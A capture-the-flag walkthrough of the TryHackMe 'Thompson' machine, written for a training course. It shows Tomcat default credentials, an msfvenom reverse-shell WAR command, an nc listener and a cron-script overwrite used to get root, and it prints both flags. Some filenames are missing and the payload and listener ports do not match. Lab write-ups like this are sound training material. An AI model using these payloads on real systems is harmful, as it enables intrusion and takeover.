boot2root machine for FIT and besides Guatemala CTF
This is the write-up for room Thompson on Tryhackme and it is part of our cybersecurity training from HackerU.
Firstly we have to make a connection with VPN or use the attack box on the Tryhackme site to connect to the Tryhackme lab environment.
Now we will deploy the machine after that we will get the Target system IP.
Once the machine is booted up then will move to our Task.Before that we have to do some enumeration, For that we will check how many ports are open and services running using Nmap scan.
nmap -sS -sV -A
(TCP SYN scan)
(Version detection)
(Aggressive scan options)
From scan we can see that 3 ports are open which are port 22,port 8080 and port 8009.
Since, port 8080/http is open, we will check in web server
We have opened the web server using the 8080 port, we got some information about tomcat
After going through entire tomcat we can see, there are 3 buttons.We will check it
We will click on the Manager App button.
Once the button is clicked, a dialog box is prompted, which is asking for the credentials. As we are not sure of the credentials, click on the cancel button, it directs to the page, which has the credentials of tomcat ,manager.
Username :- tomcat
Password :- s3cret
We will login to the tomcat manager application with the credentials we found
It is directing us to another page
In this, we saw that there is option to upload a war file.
Then we searched a little about what is war file and its details we came to know that it is java related file.
So we searched for payload using msfvenom to create war file payload.
As seen we will select java/jsp_shell_reverse_tcp payload and will create a payload warfile to get reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > shell.war
Other option is to directly search for war payload will get cheatsheat related to it.(
Now we will upload our file to the website.
Now before clicking on the file we have to start netcat to listen and to get reverse shell.
nc -lvnp 1234
open the /shell file which we uploaded and we will get the reverse shell in our system.
We got the shell now search the flags.
Inside the home directory, we got the jack user & the user flag.
user flag:- 39400c90bc683a41a8935e4719f181bf
Used interactive python not necessary.
In jack user, we have another two files “test.txt” & “”. We will find the contents of the file.
We found “test.txt” is a root.
Usually file is executed by the root users, but it is responded to test.txt file as well.
So, we will check inside the crontab.
Since, will be executed by root user, we will overwrite by fetching root.txt from the root user
echo cp root/root.txt /home/jack/root.txt >
It gives us the information of root flag.
root flag:- d89d5391984c0450a95497153ae7ca3a
Thus we successfully able to crack the box get privilege escalation and got root access and captured both the flag.